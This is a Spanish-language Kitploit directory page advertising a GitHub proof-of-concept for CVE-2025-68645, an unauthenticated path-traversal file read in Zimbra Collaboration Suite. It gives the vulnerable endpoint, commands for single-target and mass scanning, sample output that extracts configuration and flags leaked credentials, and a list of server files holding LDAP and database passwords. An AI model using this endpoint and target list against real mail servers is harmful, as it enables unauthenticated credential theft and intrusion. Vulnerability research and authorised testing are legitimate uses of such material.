Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Herramientas/GitHubGitHub/harisaidhin/poc_cve-2025-68645
ReconocimientoAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebRecopilación de InformaciónPruebas de Penetración
GitHubharisaidhin/poc_cve-2025-68645

Poc_CVE-2025-68645

Zimbra Path Traversal (CVE-2025-68645) - Vulnerabilidad de lectura de archivos no autenticada en Zimbra Collaboration Suite

Ver Repositorio
11hace 4 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-68645 - Vulnerabilidad de Path Traversal en Zimbra

Security CVE Python License Status

📋 Resumen

CVE-2025-68645 es una vulnerabilidad de path traversal en Zimbra Collaboration Suite que permite a atacantes no autenticados leer archivos arbitrarios del sistema de archivos del servidor.

Endpoint Vulnerable

/h/printconversations?javax.servlet.include.servlet_path=

🎯 Impacto

ImpactoSeveridad
Lectura de archivos sin autenticación🔴 Alto
Divulgación de configuración🔴 Alto
Filtración de credenciales🔴 Alto
Mapeo de red interna🟠 Medio

📁 Archivos Legibles

🚀 Uso

Escaneo de un Solo Objetivo

python CVE-2025-68645.py.py -t https://target.zimbra.com

Escaneo Masivo

python CVE-2025-68645.py.py -l targets.txt -o results.json --threads 20

Opciones Avanzadas

python CVE-2025-68645.py.py -t https://target.zimbra.com -v --timeout 30

📊 Argumentos de Línea de Comandos

Argumento Descripción Predeterminado -t, --target URL de un solo objetivo Ninguno -l, --list Archivo que contiene la lista de objetivos Ninguno -o, --output Nombre del archivo de salida results.json --threads Número de hilos concurrentes 10 --timeout Tiempo de espera de solicitud en segundos 15 -v, --verbose Habilitar salida detallada False --no-verify Deshabilitar verificación SSL False --read-all Leer todas las rutas sensibles False

📸 Ejemplo de Salida

[*] Scanning: https://target.zimbra.local [✓] VULNERABLE: https://target.zimbra.local [+] Extracted configuration: version: 220726130125 memcached: target.local:11211 httpsPort: 8443 httpPort: 8080 [+] Found: /WEB-INF/web.xml [+] Found: /opt/zimbra/conf/localconfig.xml [!] Possible credentials leaked in /WEB-INF/web.xml

============================================================ SCAN COMPLETE! Time elapsed: 1.02 seconds Total targets: 1 Vulnerable: 1 Not vulnerable: 0

Descargar herramienta
RutaInformación Expuesta
/WEB-INF/web.xmlMapeos de servlets, restricciones de seguridad
/WEB-INF/zcs.web.xmlConfiguración específica de Zimbra
/opt/zimbra/conf/localconfig.xmlCredenciales LDAP, contraseñas de base de datos
/opt/zimbra/conf/ldap-config.xmlConfiguración del servidor LDAP
/opt/zimbra/conf/attrs/zimbra-attrs.xmlAtributos del sistema
/WEB-INF/classes/logging.propertiesConfiguración de logging